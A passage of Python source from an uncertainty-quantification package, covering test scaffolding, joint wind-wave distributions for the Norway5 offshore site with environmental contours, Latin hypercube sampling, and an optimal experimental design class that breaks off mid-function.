# data = np.concatenate((u,x,y.reshape(1,-1)), axis=0)
# np.save(os.path.join(data_dir_result, 'FPSO_Test_McsE7R0.npy' ), data)
## ------------------------ Environmental Contour Bootstrap ----------------- ###
# print('------------------------------------------------------------')
# print('>>> Environmental Contour for Model: FPSO ')
# print('------------------------------------------------------------')
# filename = 'FPSO_DoE_EC2D_T50_y.npy'
# EC2D_data_y = np.load(os.path.join(data_dir_result, filename))[short_term_seeds_applied,:]
# filename = 'FPSO_DoE_EC2D_T50.npy'
# EC2D_data_ux= np.load(os.path.join(data_dir_result, filename))[:4,:]
# EC2D_median = np.median(EC2D_data_y, axis=0)
# EC2D_data = np.concatenate((EC2D_data_ux,EC2D_median.reshape(1,-1)), axis=0)
# y50_EC = EC2D_data[:,np.argmax(EC2D_median)]
# print(' > Extreme response from EC:')
# print(' - {:<25s} : {}'.format('EC data set', EC2D_data_y.shape))
# print(' - {:<25s} : {}'.format('y0', np.array(y50_EC[-1])))
# print(' - {:<25s} : {}'.format('Design state (u,x)', y50_EC[:4]))
# np.random.seed(100)
# EC2D_y_boots = uqra.bootstrapping(EC2D_data_y, 100)
# EC2D_boots_median = np.median(EC2D_y_boots, axis=1)
# y50_EC_boots_idx = np.argmax(EC2D_boots_median, axis=-1)
# y50_EC_boots_ux = np.array([EC2D_data_ux[:,i] for i in y50_EC_boots_idx]).T
# y50_EC_boots_y = np.max(EC2D_boots_median,axis=-1)
# y50_EC_boots = np.concatenate((y50_EC_boots_ux, y50_EC_boots_y.reshape(1,-1)), axis=0)
# y50_EC_boots_mean = np.mean(y50_EC_boots, axis=1)
# y50_EC_boots_std = np.std(y50_EC_boots, axis=1)
# print(' > Extreme response from EC (Bootstrap (n={:d})):'.format(EC2D_y_boots.shape[0]))
# print(' - {:<25s} : {}'.format('Bootstrap data set', EC2D_y_boots.shape))
# print(' - {:<25s} : [{:.2f}, {:.2f}]'.format('y50[mean, std]',y50_EC_boots_mean[-1], y50_EC_boots_std[-1]))
# print(' - {:<25s} : {}'.format('Design state (u,x)', y50_EC_boots_mean[:4]))
# u_center = y50_EC_boots_mean[ :2].reshape(-1, 1)
# x_center = y50_EC_boots_mean[2:4].reshape(-1, 1)
# print(' > Important Region based on EC(boots):')
# print(' - {:<25s} : {}'.format('Radius', radius_surrogate))
# print(' - {:<25s} : {}'.format('Center U', np.squeeze(u_center)))
# print(' - {:<25s} : {}'.format('Center X', np.squeeze(x_center)))
# print('================================================================================')
## ------------------------ Validation Dataset with shifted center ----------------- ###
# random_seed_short_term = np.arange(21)
# solver = uqra.FPSO(phase=random_seed_short_term)
# data = np.load(os.path.join(data_dir_samples, 'MCS', 'Norm', 'DoE_McsE7R0.npy' ))
# data = data[:solver.ndim, np.linalg.norm(data[:2], axis=0)<radius_surrogate]
# mcs_u = data[:solver.ndim,:int(1e5)]
# # data = np.load('/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/CLS/DoE_Cls2E7d2R0.npy')
# # mcs_u = data[:solver.ndim,:int(1e5)] * radius_surrogate
# mcs_u = mcs_u + u_center
# mcs_x = Kvitebjorn.ppf(stats.norm.cdf(mcs_u))
# print('--------------------------------------------------')
# print('>>> Running MCS ')
# print('--------------------------------------------------')
# print(' - u samples {}: mean [{}], std [{}] '.format(mcs_u.shape, np.around(np.mean(mcs_u, axis=1), 2), np.around(np.std(mcs_u, axis=1), 2)))
# print(' - x samples {}: mean [{}], std [{}] '.format(mcs_x.shape, np.around(np.mean(mcs_x, axis=1), 2), np.around(np.std(mcs_x, axis=1), 2)))
# mcs_y = solver.run(mcs_x, verbose=True)
# print(mcs_y.shape)
# mcs_data = np.concatenate((mcs_u, mcs_x, mcs_y.reshape(len(random_seed_short_term),-1)), axis=0)
# print(mcs_data.shape)
# np.save(os.path.join(data_dir_result, 'FPSO_DoE_McsE5R0.npy'), mcs_data)
# np.save(os.path.join(data_dir_result, 'FPSO_DoE_Cls2E5R0.npy'), mcs_data)
def test_samples_same(self):
for r in range(10):
filename = r'DoE_McsE6R{:d}.npy'.format(r)
print(filename)
data_dir = r'/Volumes/External/MUSE_UQ_DATA/Four_branch_system/Data/'
data1 = np.load(os.path.join(data_dir, filename))[:2,:]
data_dir = r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Normal/'
data2 = np.load(os.path.join(data_dir, filename))[:2,:]
print(np.array_equal(data1, data2))
# x = np.arange(30).reshape(3,10)
# solver = uqra.Ishigami()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.xsinx()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.poly4th()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_square_root_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.four_branch_system()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_product_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
### General Solver run testing
# print('========================TESTING: Solver =======================')
# model_name = 'linear_oscillator'
# kwargs = {
# 'time_max' : 100,
# 'dt' : 0.2,
# }
# tmax,dt = 1000, 0.1
# t = np.arange(0,tmax, dt)
# zeta = 0.01
# omega_n = 2 # rad/s
# m = 1
# k = (omega_n/2/np.pi) **2 * m
# c = zeta * 2 * np.sqrt(m * k)
# mck = (m,c,k)
# solver = uqra.Solver(model_name, x)
# y = solver.run(**kwargs)
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for EC cases
# P, nsim = 10, 25
# data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/environment'
# data_set = np.load(os.path.join(data_dir, 'Kvitebjørn_EC_P{:d}.npy'.format(P)))
# EC_x = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, EC_x)
# EC_y = np.array([solver.run(doe_method = 'EC') for _ in range(nsim)])
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for Hs Tp grid points
# nsim = 30
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# filename = 'HsTp_grid118.npy'
# data_set = np.load(os.path.join(data_dir, filename))
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, data_set)
# grid_out = np.array([solver.run(doe_method = 'GRID') for _ in range(nsim)])
# np.save(os.path.join(data_dir,'HsTp_grid118_out'), grid_out)
# data_set = np.load('DoE_McRE3R0.npy')
# x_samples = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, x_samples)
# kwargs = {'doe_method': 'MCS'}
# samples_y = solver.run(**kwargs )
# np.save('test_linear_oscillator_y', samples_y)
# # filename_tags = ['R0']
# # filename_tags = [itag+'_y' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y, 'test_linear_oscillator', os.getcwd(), filename_tags)
# samples_y_stats = solver.get_stats()
# np.save('test_linear_oscillator_y_stats', samples_y_stats)
# # filename_tags = [itag+'_y_stats' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y_stats, 'test_linear_oscillator', os.getcwd(), filename_tags)
if __name__ == '__main__':
unittest.main()
```
#### File: uqra/environment/Norway5.py
```python
import numpy as np
import scipy.stats as stats
import uqra
from ._envbase import EnvBase
class DistUw(object):
def __init__(self):
self.name = 'weibull'
self.shape= 2.029
self.loc = 0
self.scale= 9.409
self.dist = stats.weibull_min(c=self.shape, loc=self.loc, scale=self.scale) #0 #Hs_scale * (-np.log(1-u)) **(1/Hs_shape)
def ppf(self, u):
"""
Percent point function (inverse of cdf — percentiles)
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
x = self.dist.ppf(u)
return x
def cdf(self, x):
"""
Cumulative distribution function.
"""
u = self.dist.cdf(x)
return u
def rvs(self, size=1, random_state=None):
"""
Random variates.
"""
x = self.dist.rvs(size=size, random_state=random_state)
return x
def pdf(self, x):
"""
Probability density function.
"""
y = self.dist.pdf(x)
return y
class DistHs_Uw(object):
def __init__(self, uw):
self.name = 'weibull'
self.a1, self.a2, self.a3 = 2.136, 0.013, 1.709
self.b1, self.b2, self.b3 = 1.816, 0.024, 1.787
self.shape= self.a1 + self.a2 * uw ** self.a3
self.loc = 0
self.scale= self.b1 + self.b2 * uw ** self.b3
self.dist = stats.weibull_min(c=self.shape, loc=self.loc, scale=self.scale)
def ppf(self, u):
"""
Percent point function (inverse of cdf — percentiles)
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
x = self.dist.ppf(u)
return x
def cdf(self, x):
"""
Cumulative distribution function.
"""
u = self.dist.cdf(x)
return u
def rvs(self, size=1, random_state=None):
"""
Random variates.
"""
x = self.dist.rvs(size=size, random_state=random_state)
return x
def pdf(self, x):
"""
Probability density function.
"""
y = self.dist.pdf(x)
return y
class DistTp_HsUw(object):
def __init__(self, Uw, Hs):
"""
Conditional distribution of Tp given var
"""
self.name = 'lognorm'
theta, gamma = -0.255, 1.0
e1, e2, e3 = 8.0, 1.938, 0.486
f1, f2, f3 = 2.5, 3.001, 0.745
k1, k2, k3 = -0.001, 0.316, -0.145
Tp_bar = e1 + e2 * Hs**e3
u_bar = f1 + f2 * Hs**f3
niu_Tp = k1 + k2 * np.exp(Hs*k3)
mu_Tp = Tp_bar * (1 + theta * ((Uw - u_bar)/u_bar)**gamma)
mu_lnTp = np.log(mu_Tp / (np.sqrt(1 + niu_Tp**2)))
sigma_lnTp = np.sqrt(np.log(niu_Tp**2 + 1))
self.shape = sigma_lnTp
self.loc = 0
self.scale = np.exp(mu_lnTp)
self.dist = stats.lognorm(self.shape, loc=self.loc, scale=self.scale)
def ppf(self, u):
"""
Percent point function (inverse of cdf — percentiles)
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
x = self.dist.ppf(u)
return x
def cdf(self, x):
"""
Cumulative distribution function.
"""
u = self.dist.cdf(x)
return u
def rvs(self, size=1, random_state=None):
"""
Random variates.
"""
x = self.dist.rvs(size=size, random_state=random_state)
return x
def pdf(self, x):
"""
Probability density function.
"""
y = self.dist.pdf(x)
return y
def dist_tp(self, Hs, Uw):
# if len(var) == 1:
# c1, c2, c3 = 1.886, 0.365, 0.312
# d1, d2, d3 = 0.001, 0.105, -0.264
# h = var[0][0]
# mu_LTC = c1 + c2 * h ** c3
# sigma_LTC = (d1 + d2 * np.exp(d3 * h))** 0.5
# dist = cp.Lognormal(mu_LTC, sigma_LTC)
# return dist
# elif len(var) == 2:
        raise NotImplementedError('DistTp_HsUw.dist_tp: alternative conditional model is not implemented; use the frozen self.dist instead')
class DistHs(object):
"""
Hybrid lognormal and Weibull distribution, i.e., the Lonowe model
"""
def __init__(self):
self.name = 'Lonowe'
self.mu_Hs = 0.871
self.sigma_Hs = 0.506
self.Hs_shape = 1.433
self.Hs_scale = 2.547
self.h0 = 5.0
self.dist1 = stats.lognorm(s=self.sigma_Hs, scale=np.exp(self.mu_Hs))
self.dist2 = stats.weibull_min(c=self.Hs_shape, scale=self.Hs_scale)
def ppf(self, u):
"""
Return Hs samples corresponding ppf values u
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
hs1 = self.dist1.ppf(u)
hs2 = self.dist2.ppf(u)
hs = np.where(hs1 < self.h0, hs1, hs2)
return hs
def cdf(self, hs):
"""
Return Hs cdf
"""
hs_cdf1 = self.dist1.cdf(hs)
hs_cdf2 = self.dist2.cdf(hs)
hs_cdf = np.where(hs < self.h0, hs_cdf1, hs_cdf2)
return hs_cdf
def rvs(self, size=1):
hs1 = self.dist1.rvs(size=size)
hs2 = self.dist2.rvs(size=size)
hs = np.where(hs1 < self.h0, hs1, hs2)
return hs
def pdf(self, hs):
hs_pdf1 = self.dist1.pdf(hs)
hs_pdf2 = self.dist2.pdf(hs)
hs_pdf = np.where(hs < self.h0, hs_pdf1, hs_pdf2)
return hs_pdf
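# --- Illustrative check (added for clarity, not part of the original module): the two Lonowe
# --- branches are fitted to be (nearly) continuous at the switching point h0 = 5.0 m.
# >>> DistHs().dist1.cdf(5.0)   # lognormal branch, approximately 0.928
# >>> DistHs().dist2.cdf(5.0)   # Weibull branch,   approximately 0.928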
class DistTp_Hs(object):
def __init__(self, hs):
self.a1 = 1.886
self.a2 = 0.365
self.a3 = 0.312
self.b1 = 0.001
self.b2 = 0.105
self.b3 = 0.264
self.hs = hs
self.dist = stats.lognorm(s=1)
def rvs(self, size=1):
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp = stats.lognorm.rvs(sigma_tp, loc=0, scale=np.exp(mu_tp), size=[size,self.hs.size])
tp = np.squeeze(tp)
assert self.hs.shape == tp.shape
return tp
def ppf(self, u):
"""
Generate Tp sample values based on given Hs values:
"""
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp = stats.lognorm.ppf(u, sigma_tp, loc=0, scale=np.exp(mu_tp))
return tp
def cdf(self, tp):
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp_cdf = stats.lognorm.cdf(tp, sigma_tp, loc=0, scale=np.exp(mu_tp))
return tp_cdf
def pdf(self, tp):
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp_pdf = stats.lognorm.pdf(tp, sigma_tp, loc=0, scale=np.exp(mu_tp))
return tp_pdf
class Norway5(EnvBase):
"""
Reference:
Norway 5:
<NAME>, <NAME>, <NAME>. Joint environmental data at five european offshore sites for design of combined wind and wave
energy concepts. 32nd International Conference on Ocean, Offshore, and Arctic Engineering, Nantes, France, Paper
No. OMAE2013-10156, 2013.
"""
def __init__(self, spectrum='jonswap', ndim=3):
self.spectrum = spectrum
self.site = 'Norway5'
self.ndim = int(ndim)
self.is_arg_rand = [True, ] * self.ndim
if self.ndim == 3:
self.dist_name = ['weibull','weibull','lognorm']
elif self.ndim == 2:
self.dist_name = ['Lonowe','lognorm']
def dist_uw(self):
return DistUw()
def dist_hs(self, uw=None):
if self.ndim==2:
return DistHs()
elif self.ndim==3:
return DistHs_Uw(uw)
def dist_tp(self, hs, uw=None):
if self.ndim==2:
return DistTp_Hs(hs)
elif self.ndim==3:
return DistTp_HsUw(uw, hs)
def pdf(self, x):
"""
Return pdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(3, n)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_pdf = self.dist_uw().pdf(uw)
hs_pdf = self.dist_hs(uw).pdf(hs)
            tp_pdf = self.dist_tp(hs, uw).pdf(tp)
pdf_y = np.array([uw_pdf, hs_pdf, tp_pdf])
elif x.shape[0] == 2:
hs, tp = x
hs_pdf = self.dist_hs().pdf(hs)
tp_pdf = self.dist_tp(hs).pdf(tp)
pdf_y = np.array([hs_pdf, tp_pdf])
else:
raise ValueError('uqra.environment.{:s} expecting 2 or 3 random variables but {:d} are given'.format(self.site,x.shape[0]))
return pdf_y
def jpdf(self, x):
"""
Return joint pdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(n,)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_pdf = self.dist_uw().pdf(uw)
hs_pdf = self.dist_hs(uw).pdf(hs)
            tp_pdf = self.dist_tp(hs, uw).pdf(tp)
pdf_y = uw_pdf * hs_pdf * tp_pdf
elif x.shape[0] == 2:
hs, tp = x
hs_pdf = self.dist_hs().pdf(hs)
tp_pdf = self.dist_tp(hs).pdf(tp)
pdf_y = hs_pdf * tp_pdf
else:
raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(x.shape[0]))
return pdf_y
def cdf(self, x):
"""
Return cdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(3, n)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_cdf = self.dist_uw().cdf(uw)
hs_cdf = self.dist_hs(uw).cdf(hs)
            tp_cdf = self.dist_tp(hs, uw).cdf(tp)
cdf_y = np.array([uw_cdf , hs_cdf , tp_cdf])
elif x.shape[0] == 2:
hs, tp = x
hs_cdf = self.dist_hs().cdf(hs)
tp_cdf = self.dist_tp(hs).cdf(tp)
cdf_y = np.array([hs_cdf , tp_cdf])
else:
raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(x.shape[0]))
return cdf_y
def jcdf(self, x):
"""
Return cdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(n,)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_cdf = self.dist_uw().cdf(uw)
hs_cdf = self.dist_hs(uw).cdf(hs)
            tp_cdf = self.dist_tp(hs, uw).cdf(tp)
cdf_y = uw_cdf * hs_cdf * tp_cdf
elif x.shape[0] == 2:
hs, tp = x
hs_cdf = self.dist_hs().cdf(hs)
tp_cdf = self.dist_tp(hs).cdf(tp)
cdf_y = hs_cdf * tp_cdf
else:
raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(x.shape[0]))
return cdf_y
def ppf(self, u):
"""
Return Percent point function (inverse of cdf — percentiles) corresponding to u.
"""
u = np.array(u, ndmin=2)
if u.shape[0] == 3:
### make sure u is valid cdf values
            assert np.amin(u) >= 0
            assert np.amax(u) <= 1
uw = self.dist_uw().ppf(u[0])
hs = self.dist_hs(uw).ppf(u[1])
tp = self.dist_tp(hs, uw).ppf(u[2])
res = np.array([uw, hs, tp])
elif u.shape[0] == 2:
### make sure u is valid cdf values
            assert np.amin(u) >= 0
            assert np.amax(u) <= 1
hs = self.dist_hs().ppf(u[0])
tp = self.dist_tp(hs).ppf(u[1])
res = np.array([hs, tp])
else:
            raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(u.shape[0]))
return res
def rvs(self, size=None):
"""
Generate random sample for Norway5
"""
n = int(size)
if self.ndim == 3:
### generate n random Uw
uw = self.dist_uw().rvs(size=(n,))
### generate n random Hs
            hs = self.dist_hs(uw).rvs(size=(n,))
            ### generate n random Tp given above Hs
            tp = self.dist_tp(hs, uw).rvs(size=(n,))
res = np.array([uw, hs, tp])
elif self.ndim ==2:
hs = self.dist_hs().rvs(size=(n,))
### generate n random Tp given above Hs
tp = self.dist_tp(hs).rvs(size=1)
res = np.array([hs, tp])
return res
def support(self):
return ((0, np.inf),) * self.ndim
def environment_contour(self, P, T=1000, n=100, q=0.5):
"""
Return samples for Environment Contours method
arguments:
P: return period in years
T: simulation duration in seconds
n: no. of samples on the contour
q: fractile for the response variable. q=0.5 corresponds the median response
Returns:
ndarray of shape (4, n)
"""
print(r'Calculating Environment Contour samples for Norway5: {}-D'.format(self.ndim))
print(r' - {:<25s}: {}'.format('Return period (years)', P))
print(r' - {:<25s}: {}'.format('Simulation duration (sec)', T))
print(r' - {:<25s}: {}'.format('Response fractile ', q))
prob_fail = 1.0/(P * 365.25*24*3600/T)
beta = -stats.norm().ppf(prob_fail) ## reliability index
r = np.sqrt(beta**2-stats.norm(0,1).ppf(q)**2)
print(r' - {:<25s}: {:.2e}'.format('Failure probability', prob_fail))
print(r' - {:<25s}: {:.2f}'.format('Reliability index', beta))
print(r' - {:<25s}: {:.2f}'.format('Circle radius', r))
if self.ndim == 2:
U = self._create_circle(r, n=n)
elif self.ndim ==3:
U = self._create_sphere(r, n=n)
else:
raise NotImplementedError
X = self.ppf(stats.norm().cdf(U))
return U, X
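    # Worked example (illustrative, values approximate): for P = 50 years, T = 3600 s and q = 0.5,
    # prob_fail = 3600/(50*365.25*24*3600) ~ 2.28e-6, the reliability index beta ~ 4.6, and since
    # stats.norm.ppf(0.5) = 0 the contour radius r equals beta.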
def target_contour(self, uw, P, T=1000, n=100):
"""
Return EC points for specified points Uw
"""
prob_fail = T/(P * 365.25*24*3600)
beta = -stats.norm().ppf(prob_fail) ## reliability index
        u1 = stats.norm().ppf(self.dist_uw().cdf(uw))
        u2 = np.sqrt(beta**2 - u1**2)
        u3 = u2 * 0
        hs = self.dist_hs(uw).ppf(stats.norm().cdf(u2))
        tp = self.dist_tp(hs, uw).ppf(stats.norm().cdf(u3))
res = np.array([uw, hs, tp])
return res
# ===========================================================
# Sequence of conditional distributions based on Rosenblatt transformation
# ===========================================================
def _create_circle(self, r, n=100):
"""
return coordinates of points on a 2D circle with radius r
Parameters:
r: radius
n: number of points on circle
Return:
ndarray of shape(2,n)
"""
t = np.linspace(0, np.pi * 2.0, n)
x = r * np.cos(t)
y = r * np.sin(t)
res = np.array([x, y])
return res
    def _create_sphere(self, r, n=10):
        """
        return coordinates of points on a 3D sphere with radius r
        """
        lst = []
        for phi in [(np.pi*i)/(n-1) for i in range(n)]:
            M = int(np.sin(phi)*(n-1)) + 1
            for theta in [(2*np.pi*i)/M for i in range(M)]:
                x = r * np.sin(phi) * np.cos(theta)
                y = r * np.sin(phi) * np.sin(theta)
                z = r * np.cos(phi)
                lst.append((x, y, z))
        return np.array(lst).T
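# --- Minimal usage sketch (added for illustration, not part of the original API): build the
# --- 50-year environment contour of the 2-D (Hs, Tp) model for 1-hour sea states. Run it as a
# --- module (e.g. `python -m uqra.environment.Norway5`) because of the relative import above.
if __name__ == '__main__':
    env = Norway5(ndim=2)
    U, X = env.environment_contour(50, T=3600, n=36)
    print('U-space contour: {}, X-space contour: {}'.format(U.shape, X.shape))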
```
#### File: uqra/experiment/lhs.py
```python
import inspect
import numpy as np
import scipy
import pyDOE2
from uqra.experiment._experimentbase import ExperimentBase
from uqra.utilities.helpers import num2print
import warnings
warnings.filterwarnings("ignore", category=RuntimeWarning)
class LatinHyperCube(ExperimentBase):
""" Experimental Design with Lazin Hyper Cube"""
def __init__(self, distributions, **kwargs):
"""
distributions: list of scipy distributions object samples are drawn
Optional:
criterion: a string that tells lhs how to sample the points
            - default: "maximin" or "m": maximize the minimum distance between points, but place the point in a randomized location within its interval
            - None: simply randomizes the points within the intervals
            - "center" or "c": center the points within the sampling intervals
            - "centermaximin" or "cm": same as "maximin", but centered within the intervals
- “correlation” or “corr”: minimize the maximum correlation coefficient
"""
### return a list of distributions and set ndim
self.ndim, self.distributions = super()._set_distributions(distributions)
self.criterion = kwargs.get('criterion', 'maximin')
self.iterations= kwargs.get('iterations', 5)
self.filename = '_'.join(['DoE', 'Lhs'])
def __str__(self):
if self.distributions is None:
            message = 'Random samples, no distribution has been set yet'
else:
dist_names = []
for idist in self.distributions:
try:
dist_names.append(idist.name)
except:
dist_names.append(idist.dist.name)
message = 'Random samples from: {}'.format(dist_names)
return message
def samples(self, size=1,loc=0, scale=1, random_state=None):
"""
LHS sampling from distributions
Arguments:
n_samples: int, number of samples
theta: list of [loc, scale] parameters for distributions
For those distributions not specified with (loc, scale), the default value (0,1) will be applied
Return:
Experiment samples of shape(ndim, n_samples)
"""
size = super()._check_int(size)
locs, scales = super()._set_parameters(loc, scale)
lhs_u = []
for isize in size:
u = pyDOE2.lhs(self.ndim, samples=isize,
criterion=self.criterion, iterations=self.iterations,random_state=random_state).T
lhs_u.append(u)
lhs_u = np.squeeze(lhs_u)
lhs_u = np.array([idist.ppf(iu) for iu, idist in zip(lhs_u, self.distributions)])
lhs_u = np.array([iu * iscale + iloc for iu, iloc, iscale in zip(lhs_u, locs, scales)])
return lhs_u
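# --- Minimal sketch (added for illustration; uses only pyDOE2 and scipy.stats): the core idea
# --- behind LatinHyperCube.samples is to draw LHS points on [0,1]^d and push them through the
# --- inverse CDF (ppf) of each marginal distribution.
if __name__ == '__main__':
    import scipy.stats as stats
    u = pyDOE2.lhs(2, samples=10, criterion='maximin', random_state=42).T   # shape (2, 10), values in [0,1]
    x = np.array([stats.norm(0, 1).ppf(u[0]), stats.uniform(-1, 2).ppf(u[1])])
    print(x.shape)   # (2, 10)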
```
#### File: uqra/experiment/optimal_design.py
```python
from uqra.experiment._experimentbase import ExperimentBase
import uqra.utilities.helpers as helpers
import numpy as np, scipy as sp
import copy
import itertools
from tqdm import tqdm
import time, math
import multiprocessing as mp
import warnings
class OptimalDesign(ExperimentBase):
""" Quasi-Optimal Experimental Design and Optimal Design"""
def __init__(self, X):
"""
Optimal/Quasi Optimal Experimental design:
Arguments:
X: {array-like, sparse matrix} of shape (n_samples, n_features)
optimal_samples: list of indices for optimal samples
"""
super().__init__()
## return the candidate design matrix after removing selected rows
self.X = np.array(X, copy=False, ndmin=2, dtype=np.float64)
self.optimal_samples = []
self.candidate_samples = list(np.arange(X.shape[0]))
def __str__(self):
return('UQRA.Experiment.OptimalDesign')
def samples(self, optimality, n, initialization='AFP', algorithm='GREEDY', **kwargs):
"""
Perform Optimal design with specified optimality, return n samples
Return n new samples from X : Design matrix X(u) of shape(n_samples, n_features)
Arguments:
optimality: str, alphabetic optimal design
n: int, number of new samples TO BE ADDED
initialization: method to initialize optimal sample sets
1. 'TSM': truncated square matrices
2. 'AFP': Approximated Fekete Point
3. a list of indices represeting selected samples from candidate
algorithm: algorithm employed to perform each optimality
Optional:
is_orth_col: boolean, True if columns of design matrix is orthogonal to each other asymptotically
Return:
list of row indices selected
"""
n = helpers.check_int(n)
optimality = str(optimality).upper()
# self.filename = '_'.join(['DoE', optimality])
print(' > UQRA {:s}-Optimality Design: n={:d} ...'.format(optimality, n))
if isinstance(initialization, str):
## selected optimal samples must be empty
assert len(self.optimal_samples) == 0
n_initialization = min(self.X.shape[0], self.X.shape[1], n)
if initialization.upper() in ['QR', 'RRQR', 'AFP', 'FEKETE']:
optimal_samples = self._initial_samples_rrqr(n_initialization)
print(' -> 1: Initialization ({:s}), n={:d} ...'.format(initialization, len(optimal_samples)))
elif initialization.upper() in ['TSM', 'TRUNCATED', 'SQUARE']:
optimal_samples = self._initial_samples_greedy_tsm(n_initialization, optimality)
print(' -> 1: Initialization ({:s}), n={:d} ...'.format(initialization, len(optimal_samples)))
else:
                print(' -> UQRA {:s}-Optimality Design: Initialization {:s} NOT implemented'.format(optimality, initialization))
raise NotImplementedError
n = n - len(optimal_samples)
elif isinstance(initialization, (list, tuple, np.ndarray, np.generic)):
## Initialize with preselected sampels
X_rank = min(self.X.shape) ## rank of design matrix
optimal_samples = list(np.array(initialization).flatten())
print(' -> 1: Initialization with selected samples: n={:d} ...'.format(len(optimal_samples)))
## if preselected samples is less than X_rank, truncated square matrix is used
if len(optimal_samples) < X_rank:
optimal_samples0 = self._initial_samples_greedy_tsm(min(X_rank-len(optimal_samples),n), optimality,
optimal_samples=optimal_samples)
### optimal_samples0 includes preselected samples in optimal_samples
n = n - len(optimal_samples0) + len(optimal_samples)
optimal_samples = optimal_samples0
else:
print(' > {} not implemented for UQRA.OptiamlDesign'.format(initialization))
raise NotImplementedError
self.optimal_samples = optimal_samples
self.candidate_samples = self._list_diff(self.candidate_samples, optimal_samples)
assert self._check_complement(self.optimal_samples, self.candidate_samples)
if n>0:
print(' -> 2: Continue Optimality Design, n={:d} ...'.format(n))
if optimality.upper() == 'D':
optimal_samples = self.get_D_Optimality_samples(n, algorithm=algorithm)
elif optimality.upper() == 'S':
optimal_samples = self.get_S_Optimality_samples(n, algorithm=algorithm)
else:
raise ValueError('optimality {} not defined'.format(optimality))
else:
optimal_samples = []
self.optimal_samples = self._list_union(self.optimal_samples , optimal_samples)
self.candidate_samples = self._list_diff (self.candidate_samples, optimal_samples)
assert self._check_complement(self.optimal_samples, self.candidate_samples)
return self.optimal_samples
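    # Usage sketch (illustrative): for a candidate design matrix X of shape (n_candidates, n_features),
    #   doe = OptimalDesign(X)
    #   idx = doe.samples('S', n=20, initialization='AFP')   # row indices of the selected samples
    # 'AFP'/'RRQR' initialization picks up to rank(X) rows via pivoted QR; any remaining rows are
    # then added one at a time by the greedy updates implemented below.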
def get_D_Optimality_samples(self, n, algorithm):
"""
Optimal design with D-optimality
Arguments:
n: int, number of samples to be returned
Algorithm: str, algorithms used to generated D-optimal samples
Available in reference:
1 General Exchange Procedure
2 DETMAX Algorithm
3 Fedorov Algorithm
4 Modified Fedorov Algorithm
5 k-Exchange Algorithm
6 kl-Exchange Algorithm
7 Modified kl-Exchange Algorithm
Available in MATLAB:
cordexch
rowexch
Algorithms reference:
<NAME>. (2008). Design of experiments: the D-optimal approach and its implementation as a computer initialization. Bachelor's Thesis in Information and Communication Technology.
"""
if algorithm.upper() == 'GREEDY':
candidate_samples = copy.deepcopy(self.candidate_samples)
optimal_samples = copy.deepcopy(self.optimal_samples)
for _ in tqdm(range(n), ascii=True, desc=" [Greedy D]",ncols=80):
## find the next optimal index from Q which is not currently selected
candidate_samples = self._list_diff(candidate_samples, optimal_samples)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples ,:]
X_sltd = self.X[optimal_samples,:]
## calculate (log)S values for each row in X_cand together with X_sltd
optimality_values = self._greedy_update_D_Optimality_full(X_sltd, X_cand)
if len(optimality_values) != len(candidate_samples):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(candidate_samples), len(optimality_values)))
i = candidate_samples[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
## check if this index is already selected
if i in optimal_samples:
